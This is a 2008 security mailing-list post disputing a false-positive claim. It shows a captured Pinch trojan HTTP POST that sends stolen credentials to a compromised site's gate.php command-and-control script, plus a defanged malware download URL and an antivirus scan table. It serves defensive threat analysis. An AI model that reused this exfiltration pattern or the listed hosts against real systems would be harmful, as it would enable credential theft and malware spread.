[nsp-sec] 212.43.241.106 in the daily reports

Tom Fischer tfischer at bfk.de
Mon Feb 25 07:38:46 EST 2008 

Hi,

On Mon, Feb 25, 2008 at 11:51:04AM +0000, David Freedman wrote:
> ~ Your daily reports flagged 212.43.241.106 as a botnet controller with
> the URL http://www.winfleet.fr/fr/gate.php,
> I've been told the following by our systems dept:
> "The ip 212.43.241.106 is the virtual ip of our mutualized hosting.
> The script gate.php sends a mail directly or from a file
> whith information of customers' gps location of trucks.
> This script seems to be very normal.
> Can we get this removed from the reports as a false positive?

hmmm, imho that is not a false positive 

--communication excerpt-
POST /fr/gate.php HTTP/1.0
Host: www.winfleet.fr
Content-Type: application/x-www-form-urlencoded
Connection: Keep-Alive
Pragma: no-cache
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1;
InfoPath.2; .NET CLR 2.0.50727; InfoPath.1)
Content-Length: 4152

a=asd at timeparty.org&b=my_report&d=report.bin&c=UDNNTAAAAADiCAAAEQAAAAAAAAAIAAAAFwofMTDkeQkSAAAAAAAA
[...]

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
.<head>
..<title>ret_ok</title>
.</head>
.<body>
.</body>
</html>
--end of excerpt--

That's a typical Pinch/Pincher communication and response (ret_ok)!

Stolen data includes e.g. Windows licence keys, FTP accounts, ...

Malware distribution (exploit site):
hxxp://biyomedikalse.com/modules/prime/prime/ 
Sample:
hxxp://biyomedikalse.com/modules/prime/prime/exe.php 

============================================================

Scan report of: 85cadda49fce0b612c4956df4e818c74

@Proventia-VPS	-
AntiVir	DR/Delphi.Gen
Avast!	-
AVG	-
BitDefender	Trojan.Dropper.LDPinch.Q
ClamAV	-
Command	-
Dr Web	Trojan.PWS.LDPinch.1941
eSafe	-
eTrust-VET	-
eTrust-VET (BETA)	-
Ewido	-
F-Prot	-
F-Secure	-
F-Secure (BETA)	-
Fortinet	-
Fortinet (BETA)	-
Ikarus	Virus.Win32.Zapchast.DA
Kaspersky	-
McAfee	-
McAfee (BETA)	-
Microsoft	VirTool:Win32/DelfInject.gen!AA
Nod32	Win32/TrojanDropper.Agent.NIF trojan (variant)
Norman	-
Panda	-
Panda (BETA)	-
QuickHeal	-
Rising	Trojan.DL.Win32.Agent.bxw
Sophos	Mal/EncPk-CM
Sunbelt	-
Symantec	-
Symantec (BETA)	-
Trend Micro	-
Trend Micro (BETA)	-
VBA32	-
VirusBuster	Trojan.Delfinject.Gen
WebWasher	Trojan.Dropper.Delphi.Gen
YY_A-Squared	-
YY_Spybot	Worldsecurityonline.FakeAlert,,Executable

-- 
Tom Fischer
BFK edv-consulting GmbH                  tel: +49 721 962 01-1
Kriegsstr. 100, D-76133 Karlsruhe        fax: +49 721 962 01-99

More information about the nsp-security mailing list